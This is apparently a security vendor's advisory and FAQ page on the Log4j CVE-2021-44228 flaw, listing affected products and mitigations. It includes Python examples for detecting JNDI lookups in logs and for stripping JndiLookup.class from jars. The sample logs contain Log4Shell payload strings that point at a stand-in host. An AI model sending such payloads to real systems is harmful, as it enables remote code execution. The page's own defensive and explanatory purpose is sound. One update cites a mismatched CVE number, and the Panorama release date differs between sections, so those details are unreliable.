Apache Log4j Remote Code Execution vulnerability CVE-2021-44228

Last updated: 2021-12-21 10:50 hr

On Friday the 10th of December 2021, CVE-2021-44228 was published, describing a remote code execution vulnerability in Apache log4j. On this page we explain the situation and answer frequently asked questions. This page is updated on a regular basis.

Vulnerabilities themselves are common; however, this vulnerability allows an attacker to run code on the affected system. This could potentially bring the service down, be used to steal sensitive information, infect other systems, encrypt files, or anything else the attacker can think of. To make it even worse, code to exploit this vulnerability has been shared publicly on the internet, so anyone with basic system skills could use it to do harm. As a result of this code being available, large-scale scans are being observed across the internet from people trying to identify vulnerable systems.

UPDATE: On the 14th of December, CVE-2021-45046 was released describing that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.

UPDATE 2: On the 18th of December, CVE-2021-30546 was released, describing that the fix of CVE-2021-45105 in Apache Log4j 2.16.0 was incomplete due to the lack of protection against uncontrolled recursion from self-referential lookups. In addition, the severity of CVE-2021-45046 has been changed from 3.7 to 9, as it not only allows a DoS attack but can also be used for data exfiltration.

UPDATE 3: On the 18th of December, Palo Alto updated their security advisory regarding Panorama. PAN-OS for Panorama versions 9.0.*, 9.1.* and 10.0.* are affected, and a new software release is planned to be available on the 22nd of December.

UPDATE 4: On the 21st of December, Palo Alto updated their security advisory regarding Panorama. A new software release is available for Panorama to remediate the issues caused by the Apache Log4j2 Remote Code Execution vulnerability CVE-2021-44228. More information below.

Frequently Asked Questions

1. Q: Am I affected?

A: If you (or your supplier) are running Apache log4j 2.0 up to 2.16.0, you are affected.

2. Q: Can Nomios help me determine whether any of my systems are affected?

A: Yes, we can assist by delivering vulnerability scanning for Log4j and other vulnerabilities. Please contact your account executive, or get in touch with us via our contact page.

3. Q: What can I do if I’m affected?

A: There are several things you can do to mitigate the threat:

  • Update to Apache log4j version 2.17.0 or later
  • If updating is not possible, follow the workaround described here: https://logging.apache.org/log4j/2.x/security.html
  • Protect the system by adding a security device like a Web Application Firewall or Next-generation firewall with the right protective measures in front of the service
  • Disable the service

4. Q: Nomios delivers a managed network monitoring service to my organisation. Can this vulnerability in the Nomios monitoring platform be used as an attack vector on my organisation?

A: No. Our monitoring platform is not affected by the vulnerability.

5. Q: I’m a customer of a Nomios managed security service. Can the devices/platforms managed by Nomios be used as an attack vector?

A: On the 10th of December we assessed all solutions managed by Nomios as part of our managed security services (e.g. Managed Detection & Response, Managed EDR, Managed NDR). The majority of the solutions were not vulnerable. Vulnerable devices were patched to mitigate the threat. No signs of compromise were observed prior to patching.

6. Q: Can my firewall detect exploitation of the vulnerability?

A: Exploitation attempts can only be detected and blocked if the affected systems sit behind the firewall and the relevant inspection features (e.g. SSL inspection, so that encrypted traffic can be examined) are enabled in combination with the appropriate next-generation features such as IPS signatures for this vulnerability.
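To make concrete what such a firewall or log-monitoring rule has to match, the following scanner is an added example (not Nomios' or any vendor's detection logic). It runs over a few constructed web-server access log lines and flags requests carrying a JNDI lookup string. Because Log4j resolves inner lookups before outer ones, the scanner first collapses nested lookups such as lower:/upper: and default-value forms, so a JNDI string split across nested lookups is still recognised. The log lines, IP addresses and example.invalid hosts are all constructed for this example. Note that this only works on plaintext: inside TLS, the firewall sees none of it, which is why SSL inspection is a precondition above.

```python
import re

# Constructed Apache-style access log lines (sample data, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"
10.0.0.9 - - [10/Dec/2021:14:03:01 +0000] "GET /?q=${${lower:j}ndi:rmi://example.invalid/a} HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.4 - - [10/Dec/2021:14:03:40 +0000] "GET /docs/${version} HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Innermost ${...} lookup: body contains no further '$', '{' or '}'.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after normalisation, e.g. ${jndi:ldap://...}
JNDI_EXPR = re.compile(r"\$\{\s*jndi\s*:[^}]*\}?", re.IGNORECASE)


def _resolve(m):
    """Evaluate one innermost lookup the way Log4j's StrSubstitutor would."""
    body = m.group(1)
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                      # ${name:-default} -> default
        return body.split(":-", 1)[1]
    return m.group(0)                     # unknown lookup: leave untouched


def normalize(text, max_rounds=10):
    """Repeatedly resolve nested lookups until nothing changes (bounded,
    since unbounded recursion is exactly the DoS described in UPDATE 2)."""
    for _ in range(max_rounds):
        new = LOOKUP.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def scan_lines(lines):
    """Return one finding per line that carries a JNDI lookup string."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI_EXPR.search(norm)
        if m:
            hits.append({
                "line": number,
                "source": line.split(" ", 1)[0],   # first field: client IP
                "lookup": m.group(0),
                "nested": norm != line,           # was obfuscated by nesting
            })
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG.splitlines()):
        print(hit)
```

Lines 2 and 3 of the sample are reported; line 4 carries an unrelated ${version} lookup and is left alone, which is the false-positive case a signature written simply as "contains ${" would trip on.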

7. Q: I bought a networking or security product from Nomios. Is this affected?

A: Several products use Apache software, including log4j, for their management components. Below you can find a list of our vendors and the products they report as affected. This list is updated on a regular basis.

Vendor information

F5 Networks

F5 published a statement that NONE of their BIG-IP and BIG-IQ devices are vulnerable. This applies to all BIG-IP and BIG-IQ platforms and models. Please refer to the link below for more information:

https://support.f5.com/csp/article/K19026212

In addition, the F5 platform can be used to protect an affected environment through the use of an iRule to mitigate the risk or via an AWAF signature.

Fortinet

The following Fortinet products are affected:

  • FortiSIEM
  • FortiCASB
  • FortiPortal
  • FortiNAC
  • FortiConverter
  • FortiAIOps
  • FortiPolicy
  • ShieldX
  • FortiSOAR
  • FortiEDR Cloud

If you run affected products, please ensure these systems are isolated from the internet wherever possible. Further details for Fortinet can be found below:

https://www.fortiguard.com/psirt/FG-IR-21-245

https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability

Juniper Networks

Apache Log4j2 JNDI features do not protect against attacker-controlled LDAP and other JNDI-related endpoints.

PROBLEM:
Apache Log4j2 versions up to and including 2.14.1, as used in multiple Juniper Networks products, have JNDI features in configuration, log messages and parameters that do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behaviour has been disabled by default. In previous releases (>2.10) this behaviour can be mitigated by setting the system property "log4j2.formatMsgNoLookups" to "true" or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
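The two workarounds above (updating, or removing the JndiLookup class when updating is not possible) and the version range from FAQ answer 1 can be checked on disk without running any Java. The script below is an added example written for this page, not Nomios' or Juniper's tooling. It reads the log4j-core version from the jar's Maven pom.properties, checks whether JndiLookup.class is still present (including inside jars nested in a war or fat jar, where it is easily missed), classifies each finding, and can write a copy with the class removed, which is what the zip -q -d command quoted above does in place. The threshold of 2.17.0 follows FAQ answer 3; the sample jars it builds contain dummy class bytes and are constructed for the example.

```python
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIXED_VERSION = (2, 17, 0)          # advisory: update to 2.17.0 or later
ARCHIVE_EXT = (".jar", ".war", ".ear")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); tolerates suffixes such as '2.17.0-rc1'."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    return tuple(int(g or 0) for g in m.groups()) if m else None


def classify(version, jndi_present):
    """PATCH: vulnerable version with the lookup class still in place.
    MITIGATED: vulnerable version but JndiLookup.class already removed.
    OK: 2.17.0 or later (or no log4j-core version information found)."""
    if version is not None and version < FIXED_VERSION:
        return "PATCH" if jndi_present else "MITIGATED"
    return "OK"


def inspect_archive(data, location):
    """Inspect one archive given as bytes, recursing into nested archives
    (wars and fat jars usually carry log4j-core under WEB-INF/lib)."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings                 # not a zip: nothing to report
    with zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = parse_version(line.split("=", 1)[1])
        jndi = JNDI_CLASS in names
        if version is not None or jndi:
            findings.append({"location": location, "version": version,
                             "jndi_lookup_present": jndi,
                             "status": classify(version, jndi)})
        for name in sorted(names):      # nested jars, Java-style "outer!inner"
            if name.lower().endswith(ARCHIVE_EXT):
                findings.extend(inspect_archive(zf.read(name), f"{location}!{name}"))
    return findings


def scan_directory(root):
    """Walk `root` and inspect every jar/war/ear found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in sorted(files):
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path))
    return findings


def strip_jndi_lookup(src, dst):
    """Copy `src` to `dst` without JndiLookup.class (top-level entries only;
    a nested log4j-core jar needs the same treatment individually)."""
    removed = False
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for item in zin.infolist():
            if item.filename == JNDI_CLASS:
                removed = True
                continue
            zout.writestr(item, zin.read(item.filename))
    return removed


def build_sample(root):
    """Constructed test data: a vulnerable log4j-core 2.14.1 jar and a war
    embedding a patched 2.17.0 jar. Class bytes are dummies, not real classes."""
    core = os.path.join(root, "log4j-core-2.14.1.jar")
    with zipfile.ZipFile(core, "w") as z:
        z.writestr(POM_PROPS, "version=2.14.1\n")
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr(POM_PROPS, "version=2.17.0\n")
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    war = os.path.join(root, "app.war")
    with zipfile.ZipFile(war, "w") as z:
        z.writestr("WEB-INF/lib/log4j-core-2.17.0.jar", inner.getvalue())
    return core, war


if __name__ == "__main__":
    tmp = tempfile.mkdtemp()
    core, war = build_sample(tmp)
    for finding in scan_directory(tmp):
        print(finding)
    fixed = os.path.join(tmp, "log4j-core-2.14.1-nojndi.jar")
    print("removed JndiLookup.class:", strip_jndi_lookup(core, fixed))
```

A jar reported as MITIGATED still identifies as a vulnerable version to any inventory tool that only reads version strings, so keep a record of which jars were stripped; the clean outcome remains updating to 2.17.0 or later, after which the class is simply not loaded for message lookups.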

Based on the current analysis the following products may be affected by this issue:

  • JSA Series
  • Junos Space Management Applications
  • Junos Space Network Management Platform
  • Network Director
  • Secure Analytics
  • Security Director, but not Security Director Insights

Based on the current analysis the following products are vulnerable to this issue:

  • Juniper Networks Paragon Active Assurance: 21 version 21.1 and later versions; 22 version 22.2 and later versions.
  • Juniper Networks Paragon Insights: 21 version 21.1 and later versions; 22 version 22.2 and later versions.
  • Juniper Networks Paragon Pathfinder: 21 version 21.1 and later versions; 22 version 22.2 and later versions.
  • Juniper Networks Paragon Planner: 21 version 21.1 and later versions; 22 version 22.2 and later versions.

More information:

https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11259&cat=SIRT_1&actp=LIST

Earlier blog post:

https://blogs.juniper.net/en-us/enterprise-cloud-and-transformation/apache-log4j-vulnerability-cve-2021-44228-raises-widespread-concerns

Cisco

Cisco has released a very extensive list of products that are under investigation, vulnerable, or not vulnerable/already remediated. At the time of writing, major firewall solutions such as ASA and FTD are still being investigated, as is most of the Nexus switch lineup. A large number of management platforms were confirmed to be vulnerable, for which Bug IDs were created.

Since the list is too dynamic and extensive to post here, please refer to the Cisco advisory below for more details:

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd

Palo Alto Networks

Initially, Palo Alto mentioned there was no impact on their products. However, on the 18th of December, Palo Alto updated their security advisory regarding Panorama. PAN-OS for Panorama versions 9.0.*, 9.1.* and 10.0.* are affected, and a new software release is planned to be available on the 21st of December. Panorama appliances with PAN-OS 9.0, PAN-OS 9.1, and PAN-OS 10.0 are impacted by these vulnerabilities through their use of Elasticsearch.

If Panorama is running an impacted version of PAN-OS, and you are able to upgrade to PAN-OS 10.1, upgrade all appliances in affected Collector Groups to the latest PAN-OS 10.1 Preferred release (PAN-OS 10.1.3-h1) to remediate these issues.

https://security.paloaltonetworks.com/CVE-2021-44228

https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/

Netscout Arbor

Netscout confirms that no Arbor products are affected as Java was never part of this product line.

Arista Networks

These Arista products are affected:

  • CloudVision WiFi, virtual appliance or physical appliance
  • CloudVision WiFi cloud service delivery
  • Analytics Node for DANZ Monitoring Fabric (formerly Big Monitoring Fabric)
  • Analytics Node for Converged Cloud Fabric (formerly Big Cloud Fabric)
  • Embedded Analytics for Converged Cloud Fabric (formerly Big Cloud Fabric)

More information can be found here:

https://www.arista.com/en/support/advisories-notices/security-advisories/13425-security-advisory-0070

Ivanti Pulse Secure

Ivanti states that after investigation, no Pulse Secure products are affected:

https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44933

Vectra

Vectra products are not affected by the vulnerability.

More information can be found here:

https://www.vectra.ai/blogpost/cve-2021-44228-log4j-zero-day-affecting-the-internet

Others

In addition to the vendors mentioned above, the Dutch National Cyber Security Center has created a list of the affected software. Please refer to the link below for vendors not mentioned above:

https://github.com/NCSC-NL/log4shell/blob/main/software/README.md

We will continue to update this page and add more questions and answers in the coming hours and days, so please revisit this page for further updates.
